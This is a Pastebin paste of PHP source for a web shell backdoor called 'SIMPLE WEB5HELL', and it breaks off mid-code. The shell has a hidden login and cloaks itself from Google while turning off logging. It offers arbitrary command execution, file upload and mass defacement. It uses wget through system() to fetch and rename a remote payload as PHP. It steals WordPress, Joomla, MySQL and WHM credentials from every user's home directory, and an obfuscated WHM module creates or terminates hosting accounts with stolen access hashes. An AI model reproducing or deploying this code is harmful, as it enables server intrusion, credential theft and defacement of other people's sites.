Ribang

SIMPLE WEBSHELL BACKDOOR V2,8

Jun 27th, 2018
232
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 179.53 KB | None | 0 0
  1. <?php
  2. /*
  3. Simple Web5Hell Linux/Unix By © AZZATSSINS CYBERSERKERS
  4. Login Page: ?god=damn
  5. Default Password: A/Z
  6. */
  7. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
  8. $color = "#00ff00";
  9. $default_action = 'FilesMan';
  10. @define('SELF_PATH', __FILE__);
  11. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  12. header('HTTP/1.0 AZZATSSINS');
  13. exit;
  14. }
  15. @session_start();
  16. @error_reporting(0);
  17. @ini_set('error_log',NULL);
  18. @ini_set('log_errors',0);
  19. @ini_set('max_execution_time',0);
  20. @ini_set('display_errors', 0);
  21. @set_time_limit(0);
  22. @set_magic_quotes_runtime(0);
  23. @define('VERSION', '2.1');
  24. if( get_magic_quotes_gpc() ) {
  25. function stripslashes_array($array) {
  26. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  27. }
  28. $_POST = stripslashes_array($_POST);
  29. }
  30. function echoLogin() {
  31. header('HTTP/1.0 404 Not Found');
  32. if($_GET['god']=="damn"){
  33. echo'<style>
  34. input { margin:0;background-color:#fff;border:1px solid #fff; }
  35. </style>
  36. <center>
  37. <input type=password name=lol><br>
  38. <input type=password name=lol><br>
  39. <input type=password name=lol><br>
  40. <input type=password name=lol><br>
  41. <form method=post>
  42. <input type=password name=pass>
  43. </form><br>
  44. <input type=password name=lol><br>
  45. <input type=password name=lol><br>
  46. <input type=password name=lol><br>
  47. <input type=password name=lol><br>
  48. </center>';
  49. }
  50. exit;
  51. }
  52. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  53. if( empty( $auth_pass ) ||
  54. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  55. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  56. else
  57. echoLogin();
  58.  
  59. @error_reporting(0);
  60. @ini_set('output_buffering',0);
  61. @ini_set('display_errors', 0);
  62. @ini_set('log_errors',0);
  63. /*
  64. SIMPLE WEB5HELL V1
  65. Script Edited By AZZATSSINS CYBERSERKERS (Editor/Author)
  66. Twitter : @AZZATSSINS
  67. Facebook: /AZZATSSINS.CYBERSERKERS
  68. VK: /azzatssins
  69. Dont Change ©Author/Editor® ^_^
  70. */
  71. echo "<title>SIMPLE WEB5HELL</title><body bgcolor=silver><center><br><div style='background:#d400f4;margin:0px;padding:26px;text-align:center;color:#202020;'><b><i><div style='background:red;margin:0px;padding:8px;text-align:center;color:white;'>[<a href='?'>HOME</a>] [<a href='?whmcs=decode'>WHMCS DECODER</a>] [<a href='?WHMCS=REMOTE'>WHMCS REMOTE</a>] [<a href='?reseller=grabber'>RESELLER</a>] [<a href='?whmcs=scan'>WHMCS SCANNER</a>] [<a href='?whmcs=shell'>WHMCS INJECT</a>] [<a href='?whmcs=client'>WHMCS CLIENT</a>] [<a href='?ceck=whmcs'>WHMCS CECK</a>] [<a href='?whmcs=token'>BYPASS TOKEN</a>] [<a href='?AZZATSSINS=CONFIGRABBER'>CONFIG</a>]</div><br><div style='background:silver;margin:0px;padding:10px;text-align:center;color:red;'>[<a href='?AZZATSSINS=encrypt'>ENCRYPTIONS</a>] [<a href='?md5=decrypter'>DECRYPTIONS</a>] [<a href='?open=ports'>OPEN PORT</a>] [<a href='?jo=wp'>JOWP</a>] [<a href='?AZZATSSINS=JPASS'>JOOMLA LOGIN</a>] [<a href='?AZZATSSINS=WPASS'>WORDPRESS LOGIN</a>] [<a href='?traindt=login'>TRAINDT LOGIN</a>] [<a href='?nuke=login'>NUKE LOGIN</a>] [<a href='?AZZATSSINS=BOMAIL'>BOMAIL</a>] [<a href='?mas=mailer'>MAILER</a>]</div><br><div style='background:lime;margin:0px;padding:10px;text-align:center;color:#202020;'><form method='POST'><input type='submit' name='azzatssins1' value='CONFIG'> <input type='submit' name='azzatssins' value='WHMCS DECODE'> <input type='submit' name='azzatssins2' value='JUMPING'> <input type='submit' name='azzatssins3' value='SYMLINK 01'> <input type='submit' name='azzatssins4' value='SYMLINK 02'> <input type='submit' name='azzatssins5' value='BYPASS FUN'> <input type='submit' name='azzatssins6' value='MYSQL'> <input type='submit' name='azzatssins7' value='SERVER VULN'> <input type='submit' name='azzatssins9' value='MASSDEFACE'> <input type='submit' name='azzatssins8' value='HIDE UR ASS'></i></b><br></form></div>";
  72. $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
  73. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  74.  
  75. $UName = `uname -a`;
  76. $SCWD = `pwd`;
  77. $UserID = `id`;
  78.  
  79. if( $currentWD == "" ) {
  80. $currentWD = $SCWD;
  81. }
  82.  
  83.  
  84. if( $_POST['_act'] == "List files!" ) {
  85. $currentCMD = "ls -la";
  86. }
  87.  
  88. echo "<div style='background:orange;margin:0px;padding:26px;text-align:center;color:#202020;'><br><form method=post enctype=\"multipart/form-data\"><table>";
  89.  
  90. echo "<tr><td><b>Execute command:</b></td><td><input size=30 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
  91. echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  92.  
  93. echo "<tr><td><b>Change directory:</b></td><td><input size=30 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  94. echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  95.  
  96. echo "<tr><td><b>Upload file:</b></td><td><input size=15 type=file name=_upl></td>";
  97. echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  98.  
  99. echo "</table></form>";
  100. echo"</div><br><br></div></center>";
  101.  
  102. if($_POST['azzatssins9']){
  103. ?>
  104. <br><center><b><i><form ENCTYPE="multipart/form-data" method=post>
  105. Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
  106. <br>
  107. Nama File : <input typ=text name=file size=20 value="index.htm">
  108. <br>URL Script :
  109. <input typ=text name=url size=30 value="http://wget.yu.tl/files/lol.css">
  110. <br>
  111. <input type=submit value=Deface>
  112. </form></i></b></center>
  113. <?php
  114. $path=$_POST[path];
  115. $file=$_POST[file];
  116. $script=$_POST[url];
  117. $dir=opendir("$path");
  118. while($row=readdir($dir))
  119. {
  120. $start=@fopen("$row/$file","w+");
  121. $code=@file_get_contents($script);
  122. $finish=@fwrite($start,$code);
  123. if ($finish)
  124. {
  125. echo "$row/$file > Done<br><br>";
  126. }
  127. } /*MassDeface by AZZATSSINS*/
  128. }
  129. if($_POST['azzatssins']){
  130. system('wget www.wget.yu.tl/files/wd.css');system('mv wd.css wd.php'); echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';
  131. }
  132. if($_POST['azzatssins1']){
  133. /*Config Grabber By AZZATSSINS CYBERSERKERS*/
  134. //$us = file_get_contents("/etc/passwd");
  135. $usa = fopen('/etc/passwd','r');
  136. $dir = mkdir('AZZATSSINS', 0777);
  137. $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
  138. $frr = fopen('AZZATSSINS/.htaccess', 'w');
  139. fwrite($frr, $rrrr);
  140. while($us = fgets($usa)){
  141. if($us==""){
  142. echo "<font color=red>can't read /etc/passwd</font>";
  143. }
  144. else{
  145. preg_match_all('/(.*?):x:/', $us, $user_byk);
  146. foreach($user_byk[1] as $user){
  147. $dir1 = "/home/$user/public_html/";
  148. if(is_readable($dir1)){
  149.  
  150. system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS-azzatssins.txt');
  151. system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS-azzatssins.txt');
  152. system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC-azzatssins.txt');
  153. system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP-azzatssins.txt');
  154. system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM-azzatssins.txt');
  155. }
  156. else{
  157. }
  158. }
  159. }
  160.  
  161. } system('rm AZZATSSINS/.htaccess');
  162.  
  163. echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; }
  164.  
  165. if($_GET['WHMCS']=="REMOTE"){
  166. $emailente = '[email protected]';
  167. $nama = 'azzatssins';
  168. $ {
  169. "GLOBALS"
  170. }
  171. ["rshhhhzdjivn"] = "hostname";
  172. $ {
  173. "GLOBALS"
  174. }
  175. ["qybmmyvo"] = "dm5";
  176. $ {
  177. "GLOBALS"
  178. }
  179. ["cgdqizbjb"] = "infomail";
  180. $ {
  181. "GLOBALS"
  182. }
  183. ["ugwdatuetm"] = "httpheaders";
  184. $ {
  185. "GLOBALS"
  186. }
  187. ["jmossxbfynir"] = "frommail";
  188. $ {
  189. "GLOBALS"
  190. }
  191. ["buubgbf"] = "tomail";
  192. $ {
  193. "GLOBALS"
  194. }
  195. ["tfoqdtkoozl"] = "httpheader";
  196. $ {
  197. "GLOBALS"
  198. }
  199. ["gkfjmmp"] = "info";
  200. $ {
  201. "GLOBALS"
  202. }
  203. ["htlxwjkdfnbx"] = "subject";
  204. $ {
  205. "GLOBALS"
  206. }
  207. ["wyuvccqfyby"] = "emailente";
  208. $ {
  209. "GLOBALS"
  210. }
  211. ["yhcbrtqybhn"] = "tujuan";
  212. $ {
  213. "GLOBALS"
  214. }
  215. ["epyufhqui"] = "sep";
  216. $ {
  217. "GLOBALS"
  218. }
  219. ["klnlsxvu"] = "dm1";
  220. $ {
  221. "GLOBALS"
  222. }
  223. ["mgzcndyuozix"] = "dm4";
  224. $ {
  225. "GLOBALS"
  226. }
  227. ["bgyfsievqc"] = "dm3";
  228. $ {
  229. "GLOBALS"
  230. }
  231. ["cnpybqg"] = "dm2";
  232. $ {
  233. "GLOBALS"
  234. }
  235. ["cemjvape"] = "II11II11II11II11";
  236. $ {
  237. "GLOBALS"
  238. }
  239. ["tttkddsbp"] = "version";
  240. $ {
  241. "GLOBALS"
  242. }
  243. ["jqstuo"] = "bawah";
  244. $ {
  245. "GLOBALS"
  246. }
  247. ["rrbcihfi"] = "separator";
  248. $ {
  249. "GLOBALS"
  250. }
  251. ["lqfwxtwbjz"] = "hash";
  252. $ {
  253. "GLOBALS"
  254. }
  255. ["cntvmeburrl"] = "virgous";
  256. $ {
  257. "GLOBALS"
  258. }
  259. ["ejmlkkd"] = "i";
  260. $ {
  261. "GLOBALS"
  262. }
  263. ["rwocuxf"] = "result";
  264. $ {
  265. "GLOBALS"
  266. }
  267. ["sxeebm"] = "item";
  268. $ {
  269. "GLOBALS"
  270. }
  271. ["ppujmk"] = "element";
  272. $ {
  273. "GLOBALS"
  274. }
  275. ["kwsayld"] = "list";
  276. $ {
  277. "GLOBALS"
  278. }
  279. ["sqbtmnd"] = "xml";
  280. $ {
  281. "GLOBALS"
  282. }
  283. ["zmibinpgipr"] = "xmlstr";
  284. $ {
  285. "GLOBALS"
  286. }
  287. ["ltwtigrphxuo"] = "rawResult";
  288. $ {
  289. "GLOBALS"
  290. }
  291. ["nsqdbsct"] = "header";
  292. $ {
  293. "GLOBALS"
  294. }
  295. ["fughgfkrc"] = "api_path";
  296. $ {
  297. "GLOBALS"
  298. }
  299. ["xiykwn"] = "errstr";
  300. $ {
  301. "GLOBALS"
  302. }
  303. ["lvnrwks"] = "accessHash";
  304. $ {
  305. "GLOBALS"
  306. }
  307. ["gueuhqn"] = "user";
  308. ?>
  309.  
  310. <html>
  311. <head>
  312. <title>WHM Remote Access</title>
  313. <meta name="description" content="remote access whm" />
  314. <meta name="description" content="accesswhmusingxmlapi" />
  315. <meta name="keywords" content="remoteaccesswhm"/>
  316. <meta name="keywords"content = "access whm using xml api"/>
  317. </head>
  318. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  319. <STYLE>
  320. textarea{
  321. BORDER: dashed 1px blue;
  322. BORDER-COLOR: blue;
  323. background-image: url('http://i.imgur.com/zHNCk2e.gif');
  324. font: 5pt Verdana;
  325. color: lime;
  326. font-weight:bold;
  327. font-family: Tahoma;
  328. }
  329. body {
  330. font-family: Tahoma
  331. }
  332. tr {
  333. BORDER: dashed 1px #333;
  334. font: 5pt Verdana;
  335. color: #FFF;
  336. }
  337. td {
  338. BORDER: dashed 1px #333;
  339. font: 5pt Verdana;
  340. color: #FFF;
  341. }
  342.  
  343. .tr2 {
  344. BORDER: dashed 1px blue;
  345. background-color: black;
  346. font: 5pt Verdana;
  347. color: #FFF;
  348. }
  349. .td2 {
  350. BORDER: dashed 1px blue;
  351. background-color: black;
  352. font: 5pt Verdana;
  353. color: #FFF;
  354. }
  355.  
  356. hr {
  357. BORDER: dashed 1px blue;
  358. color: #FFF;
  359. }
  360. .table1 {
  361. BORDER: 0px Black;
  362. BACKGROUND-COLOR: Black;
  363. font: 5pt Verdana;
  364. color: #FFF;
  365. }
  366. .td1 {
  367. BORDER: 0px;
  368. BORDER-COLOR: #333333;
  369. font: 5pt Verdana;
  370. color: white;
  371. }
  372. .tr1 {
  373. BORDER: 0px;
  374. BORDER-COLOR: #333333;
  375. font: 5pt Verdana;
  376. color: #FFF;
  377. }
  378. table {
  379. BORDER: dashed 2px blue;
  380. BORDER-COLOR: blue;
  381. font: 5pt Verdana;
  382. color: #FFF;
  383. }
  384. input {
  385. border : dashed 1px;
  386. border-color : blue;
  387. BACKGROUND-COLOR: Black;
  388. font: 5pt Verdana;
  389. color: white;
  390. }
  391. select {
  392. BORDER-RIGHT: Black 1px solid;
  393. BORDER-TOP: #DF0000 1px solid;
  394. BORDER-LEFT: #DF0000 1px solid;
  395. BORDER-BOTTOM: Black 1px solid;
  396. BORDER-color: #FFF;
  397. BACKGROUND-COLOR: Black;
  398. font: 5pt Verdana;
  399. color: white;
  400. }
  401. submit {
  402. BORDER: buttonhighlight 2px outset;
  403. BACKGROUND-COLOR: Black;
  404. width: 30%;
  405. font: 5pt Verdana;
  406. color: #FFF;
  407. }
  408. BODY {
  409. SCROLLBAR-FACE-COLOR: Black;
  410. SCROLLBAR-HIGHLIGHT-color: #FFF;
  411. SCROLLBAR-SHADOW-color: #FFF;
  412. SCROLLBAR-3DLIGHT-color: #FFF;
  413. SCROLLBAR-ARROW-COLOR: Black;
  414. SCROLLBAR-TRACK-color: #FFF;
  415. SCROLLBAR-DARKSHADOW-color: #FFF
  416. margin: 1px;
  417. color: Red;
  418. background-color: Black;
  419. }
  420. .main {
  421. margin: -287px 0px 0px -490px;
  422. BORDER: dashed 1px #333;
  423. BORDER-COLOR: #333333;
  424. }
  425.  
  426. .inputzbut{
  427. background-color:black;
  428. font: 5pt Verdana;
  429. color:white;
  430. margin:0px;
  431. colspan:0px;
  432. border:1px solid #444444;
  433. border-bottom:1px solid blue;
  434. border-top:1px solid blue;
  435. border-right:1px solid blue;
  436. border-left:1px solid blue;
  437. }
  438.  
  439. .input2{
  440. background-color: black;
  441. color:white;
  442. font: 5pt Verdana;
  443. border:0px solid #444444;
  444. border-bottom:0px solid blue;
  445. border-top:0px solid blue;
  446. border-right:0px solid blue;
  447. border-left:0px solid blue;
  448. }
  449. .areazbut{
  450. background: black;
  451. font: 5pt Verdana;
  452. color:white;
  453. margin:0 4px;
  454. border:1px solid #444444;
  455. border-bottom:1px solid blue;
  456. border-top:1px solid blue;
  457. border-right:1px solid blue;
  458. border-left:1px solid blue;
  459. }
  460.  
  461. .tt {
  462. background-color: Black;
  463. }
  464. .areaz {
  465. margin:auto;
  466. border:1px solid blue;
  467. width:80%;
  468. height:180px;
  469. background:#000000;
  470. padding:0 2px;
  471. }
  472. .areas {
  473. margin:auto;
  474. border:1px solid blue;
  475. width:100%;
  476. height:220px;
  477. background:#000000;
  478. padding:0 2px;
  479. }
  480. A.su {
  481. color: white;
  482. }
  483. A.su:link {
  484. text-decoration: none;
  485. color:red;
  486. }
  487. A.su:visited {
  488. text-decoration: none;
  489. color: red;
  490. }
  491. A.su:hover {
  492. text-decoration: underline;
  493. color: red;
  494. }
  495. A.su:active {
  496. text-decoration: none;
  497. color: red;
  498. }
  499. A.asu {
  500. color:yellow;
  501. }
  502. A.asu:link {
  503. text-decoration: none;
  504. color:yellow;
  505. }
  506. A.asu:visited {
  507. text-decoration: none;
  508. color:yellow;
  509. }
  510. A.asu:hover {
  511. text-decoration: underline;
  512. color:yellow;
  513. }
  514. A.asu:active {
  515. text-decoration: none;
  516. color: yellow;
  517. }
  518. A.asuu {
  519. color:lime;
  520. }
  521. A.asuu:link {
  522. text-decoration: none;
  523. color:lime;
  524. }
  525. A.asuu:visited {
  526. text-decoration: none;
  527. color:lime;
  528. }
  529. A.asuu:hover {
  530. text-decoration: underline;
  531. color:lime;
  532. }
  533. A.asuu:active {
  534. text-decoration: none;
  535. color:lime;
  536. }
  537. A:link {
  538. COLOR: White;
  539. TEXT-DECORATION: none
  540. }
  541. A:visited {
  542. COLOR: White;
  543. TEXT-DECORATION: none
  544. }
  545. A:hover {
  546. color: Red;
  547. TEXT-DECORATION: none
  548. }
  549. A:active {
  550. color: Red;
  551. TEXT-DECORATION: none
  552. }
  553. #result{margin:10px;}
  554. #result span{display:block;}
  555. #result .X{background-color:#101010;}
  556. #result .Y{background-color:green;}
  557. #result .Z{background-color:red;}
  558. a { text-decoration:none; }
  559. a:hover{ border-bottom:2px solid red; }
  560.  
  561. *{ color:white; }
  562.  
  563. #menu{ background:#111111;margin:8px 2px 4px 2px; }
  564.  
  565. #menu a{ padding:4px 18px;
  566. margin:0;
  567. background:#black;
  568. text-decoration:none;
  569. letter-spacing:2px;
  570. border-radius: 4px;
  571. border-bottom:2px solid #444444;
  572. border-top:2px solid #444444;
  573. border-right:2px solid lime;
  574. border-left:2px solid lime;
  575. }
  576.  
  577. #menu a:hover{
  578. background:#191919;
  579. border-radius: 7px;
  580. border-bottom:2px solid #white;
  581. border-top:2px solid #white;
  582. border-right:2px solid #FF0000;
  583. border-left:2px solid #FF0000;
  584. }
  585.  
  586.  
  587.  
  588. .main { width:90%;
  589. background:#000000;
  590. margin:30px auto 10px;
  591. padding:10px 10px 5px 10px;
  592. border-radius:5px;
  593. -moz-border-radius:5px;
  594. -moz-box-shadow:0px 0px 10px #FFFFFF;
  595. }
  596.  
  597. .output { margin:auto;
  598. border:1px solid red;
  599. width:100%;
  600. height:400px;
  601. background:#000000;
  602. padding:0 2px; }
  603.  
  604.  
  605. .b1{
  606. font-size:30px;padding:0;color:white;
  607. }
  608. .b2{
  609. font-size:40px;padding:0;color:red;
  610. }
  611. .b3{
  612. font-size:20px;padding:0;color:#444444;
  613. }
  614.  
  615. .info{ background:#111111;
  616. width:99%;
  617. padding:5px;
  618. margin:10px auto 5px;
  619. text-align:center;
  620. font-size:13px;}
  621. .info a{ font-size:14px;}
  622. .info span{ font-size:14px;}
  623. .jaya{ margin:5px; text-align:right; }
  624. </style>
  625. </td></table></tr>
  626. </head>
  627. <center>
  628. <table border="1" width="100%"><tbody>
  629. <td>
  630. <center><p>
  631. <form method="GET">
  632. <input style="border : dashed 0px;"type="submit" name="azzatssins" value="WHM REMOTE ACCESS" id="button">
  633. </form>
  634. <form method="post" name="pageform" action="" onsubmit="return validate(this);">
  635. <p>
  636. <textarea rows="15" cols="38" name="vhash"></textarea>
  637. <p>
  638. <table border="1">
  639. <tr>
  640. <td align="center">
  641. Host Name
  642. </td>
  643. <td align="center">
  644. WHM Owner
  645. </td></tr>
  646. <td align="center">
  647. <input name="vhost" type="text" size="25" value=""></td>
  648. <td align="center">
  649. <input name="vuser" type="text"size="25" value="">
  650. </td></tr>
  651. <td colspan="2" align="center">
  652. <input name="azzatssins1" type="submit" value=" Info Hostname - WHM Version - Account - Package"></td></tr></table>
  653. </center>
  654. <br />
  655. </td>
  656. <td align="center"><br />
  657.  
  658.  
  659. <input type="submit" name="v2" value="Create Account" id="button"><br /><br/>
  660. <input type="submit" name="v3" value="Account Sumarry" id="button"><br /><br />
  661. <input type="submit" name="v4" value="Change Password" id="button"><br /><br />
  662. <input type="submit" name="v5" value="Suspend Account" id="button"><br /><br />
  663. <input type="submit"name="v6" value="Unsuspend Account" id="button"><br /><br />
  664. <input type="submit" name="v7" value="Terminate Account" id="button"><br /><br />
  665.  
  666. </td>
  667. </tr>
  668. </form></tbody></table>
  669. <table border="1" width="100%">
  670. <tr><td align="center">
  671. <!-- start xml api -->
  672.  
  673. <?php
  674. set_time_limit(1);error_reporting(1);ini_set("memory_limit","64M");header("Content-Type: text/html; charset=UTF-8");class Whm{var$controller=true;var$host=null;var$user=null;var$accessHash=null;var$errors=array();var$fp=null;function startup(&$controller){${"GLOBALS"}["bjabneswp"]="controller";$this->controller=&${${"GLOBALS"}["bjabneswp"]};}function init($host,$user,$accessHash){$this->host=$host;$this->user=${${"GLOBALS"}["gueuhqn"]};${${"GLOBALS"}["lvnrwks"]}=str_replace(array("
  675. ","
  676. "),"",${${"GLOBALS"}["lvnrwks"]});$this->accessHash=${${"GLOBALS"}["lvnrwks"]};}function connect($api_path){$pwrwkxx="errstr";$jxjnjhhffhhg="errno";$mobgrxe="errno";$ocsywwsfh="header";${"GLOBALS"}["npulqtw"]="header";$this->fp=fsockopen("ssl://".$this->host,2087,${$jxjnjhhffhhg},${$pwrwkxx},30);if(${$mobgrxe}==0&&$this->fp==false){$this->errors[]="Socket Error: Could not initialize socket.";return false;}elseif($this->fp==false){${"GLOBALS"}["ydhija"]="errno";$this->errors[]="Socket Error #".${${"GLOBALS"}["ydhija"]}.": ".${${"GLOBALS"}["xiykwn"]};return false;}$lirchk="header";$ikxgyddec="header";${$ikxgyddec}="";${$ocsywwsfh}.="GET ".${${"GLOBALS"}["fughgfkrc"]}." HTTP/1.0
  677. ";${${"GLOBALS"}["nsqdbsct"]}.="Host: ".$this->host."
  678. ";${$lirchk}.="Connection: Close
  679. ";${${"GLOBALS"}["nsqdbsct"]}.="Authorization: WHM ".$this->user.":".$this->accessHash."
  680. ";${${"GLOBALS"}["npulqtw"]}.="
  681. ";if(!@fputs($this->fp,${${"GLOBALS"}["nsqdbsct"]})){$this->errors[]="Unable to send header.";return false;}}function disconnect(){fclose($this->fp);}function getOutput(){$bwnxdryfqk="result";${"GLOBALS"}["bcgmchpujiui"]="rawResult";${"GLOBALS"}["pbiqulfirt"]="rawResultParts";$lukxqqrie="result";$umsdbbq="rawResult";${${"GLOBALS"}["bcgmchpujiui"]}="";${"GLOBALS"}["xxtvnpe"]="rawResultParts";while(!feof($this->fp)){${${"GLOBALS"}["ltwtigrphxuo"]}.=@fgets($this->fp,128);}${${"GLOBALS"}["xxtvnpe"]}=explode("
  682.  
  683. ",${$umsdbbq});${$lukxqqrie}=${${"GLOBALS"}["pbiqulfirt"]}[1];return${$bwnxdryfqk};}function version(){$this->connect("/xml-api/version");${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});return$xml->version;}function gethostname(){$frzbhexw="xmlstr";$this->connect("/xml-api/gethostname");$mttfht="xmlstr";${$mttfht}=$this->getOutput();$kbewsugpk="xml";$hdcaeudhj="xmlstr";if(${$hdcaeudhj}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$kbewsugpk}=new SimpleXMLElement(${$frzbhexw});return$xml->hostname;}function listaccts(){${"GLOBALS"}["crvwckqlxh"]="xmlstr";$this->connect("/xml-api/listaccts");${"GLOBALS"}["wcrfjl"]="list";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();$eqksyigyu="xmlstr";$gsrvsafam="i";if(${${"GLOBALS"}["crvwckqlxh"]}==""){$this->errors[]="No output.";return false;}$sjwtvwj="list";$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new DOMDocument();$xml->loadXML(${$eqksyigyu});${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("user");${$gsrvsafam}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["user"]=$item->nodeValue;$xptvqyyhz="i";${$xptvqyyhz}++;}}$mhlrnwepg="element";${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("domain");${"GLOBALS"}["dkbptovxc"]="i";${${"GLOBALS"}["dkbptovxc"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["gnijdvt"]="i";$vnmpqxit="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["gnijdvt"]}]["domain"]=$item->nodeValue;${$vnmpqxit}++;}}${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("plan");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${${"GLOBALS"}["ppujmk"]}){$kgpxaihbbt="item";foreach($element->childNodes AS${$kgpxaihbbt}){$gznkditpwjv="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["package"]=$item->nodeValue;${$gznkditpwjv}++;}}${$sjwtvwj}=$xml->getElementsByTagName("unix_startdate");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["wcrfjl"]} AS${$mhlrnwepg}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["jnspmcrgop"]="i";$fdsrmhfo="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["jnspmcrgop"]}]["start_date"]=$item->nodeValue;${$fdsrmhfo}++;}}return${${"GLOBALS"}["rwocuxf"]};}function listPkgs(){$olbumfu="xml";${"GLOBALS"}["bhqjwy"]="xmlstr";$vkvqwmml="list";$this->connect("/xml-api/listpkgs");${"GLOBALS"}["pesngtvb"]="list";$oxhlzbad="element";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["bhqjwy"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$olbumfu}=new DOMDocument();$xml->loadXML(${${"GLOBALS"}["zmibinpgipr"]});${"GLOBALS"}["widejwlmsrbo"]="i";${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("name");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["kwsayld"]} AS${$oxhlzbad}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["gljaytjur"]="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["gljaytjur"]}]["package_name"]=$item->nodeValue;${${"GLOBALS"}["ejmlkkd"]}++;}}${${"GLOBALS"}["kwsayld"]}=$xml->getElementsByTagName("QUOTA");${"GLOBALS"}["oenwrsg"]="element";${${"GLOBALS"}["widejwlmsrbo"]}=0;foreach(${$vkvqwmml} AS${${"GLOBALS"}["oenwrsg"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["uusrhduy"]="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["package_quota"]=$item->nodeValue;${${"GLOBALS"}["uusrhduy"]}++;}}${"GLOBALS"}["vlgvletxhhl"]="list";${${"GLOBALS"}["vlgvletxhhl"]}=$xml->getElementsByTagName("BWLIMIT");${${"GLOBALS"}["ejmlkkd"]}=0;foreach(${${"GLOBALS"}["pesngtvb"]} AS${${"GLOBALS"}["ppujmk"]}){foreach($element->childNodes AS${${"GLOBALS"}["sxeebm"]}){${"GLOBALS"}["pspifihvqw"]="result";$inxltlyc="i";${${"GLOBALS"}["pspifihvqw"]}[${$inxltlyc}]["package_bw_limit"]=$item->nodeValue;${${"GLOBALS"}["ejmlkkd"]}++;}}return${${"GLOBALS"}["rwocuxf"]};}function createAccount($acctDomain,$acctUser,$acctPass,$acctPackg){$vnxrfpopyezq="xml";$tybhaauxoko="xmlstr";${"GLOBALS"}["ohdlmvgirrg"]="xmlstr";$this->connect("/xml-api/createacct?username=$acctUser&password=$acctPass&plan=$acctPackg&domain=$acctDomain&ip=n&cgi=y&frontpage=y&cpmod=x3&useregns=1&reseller=1");${$tybhaauxoko}=$this->getOutput();if(${${"GLOBALS"}["ohdlmvgirrg"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${$vnxrfpopyezq}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->result->status==1){$mhcvech="result";${"GLOBALS"}["bhvgxqme"]="result";${${"GLOBALS"}["rwocuxf"]}["status"]=$xml->result->status;${$mhcvech}["statusmsg"]=$xml->result->statusmsg;$snkwgpps="result";${${"GLOBALS"}["rwocuxf"]}["ip"]=$xml->result->options->ip;${"GLOBALS"}["ulbbaopz"]="result";${${"GLOBALS"}["rwocuxf"]}["nameserver"]=$xml->result->options->nameserver;${"GLOBALS"}["qtgspvp"]="result";${"GLOBALS"}["lehyuj"]="result";${${"GLOBALS"}["ulbbaopz"]}["nameserver2"]=$xml->result->options->nameserver2;${${"GLOBALS"}["rwocuxf"]}["nameserver3"]=$xml->result->options->nameserver3;${${"GLOBALS"}["lehyuj"]}["nameserver4"]=$xml->result->options->nameserver4;${$snkwgpps}["package"]=$xml->result->options->package;${${"GLOBALS"}["qtgspvp"]}["rawout"]=$xml->result->rawout;return${${"GLOBALS"}["bhvgxqme"]};}else{$this->errors[]=$xml->result->statusmsg;return false;}}function 